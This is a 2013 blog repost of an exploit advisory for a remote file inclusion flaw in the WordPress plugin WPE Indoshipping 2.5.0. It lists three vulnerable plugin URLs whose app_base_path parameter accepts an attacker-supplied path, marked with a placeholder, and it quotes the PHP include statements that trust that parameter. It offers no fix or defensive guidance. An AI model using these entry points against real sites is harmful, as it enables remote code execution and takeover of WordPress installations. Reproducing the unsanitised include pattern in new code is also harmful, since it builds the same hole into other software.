Tuesday 26 November 2013

Wordpress Plugin WPE Indoshipping Remote File Inclusion

```========================================================
[+] Title : Wordpress Plugin WPE Indoshipping Remote File Inclusion
[+] Author : Altiiever
[+] Version : 2.5.0
[+] Download : http://downloads.wordpress.org/plugin/wpe-indoshipping.2.5.0.zip
[+] Vulnerability : RFI
```========================================================

|
| [ Vulnerable ]
|
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/wpe_indoshipping.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin-functions.php?app_base_path= [cukZ]
| http://localhost/wordpress/wp-content/plugins/wpe-indoshipping/admin/admin.php?app_base_path= [cukZ]
|
| [ Bug ]
|
| [!] wpe_indoshipping.php
| -include $app_base_path.'admin/admin.php';
| [!] admin-functions.php
| -include_once $app_base_path.'upload/'.$dbfile;
| [!] admin.php
| -include $app_base_path.'admin/admin-functions.php';
| -include $app_base_path.'admin/shipping-manager.php';
| -include $app_base_path.'admin/form-builder.php';
| -include $app_base_path.'admin/tools.php';
| -include $app_base_path.'assets/readme.html';
|

# F7370C7E850A2BBF 1337day.com [2013-11-27] 1098BDC6E5875201 #

Labels:

posted by IT dan Desain @ November 26, 2013   0 Comments

0 Comments:

Post a Comment

Subscribe to Post Comments [Atom]

<< Home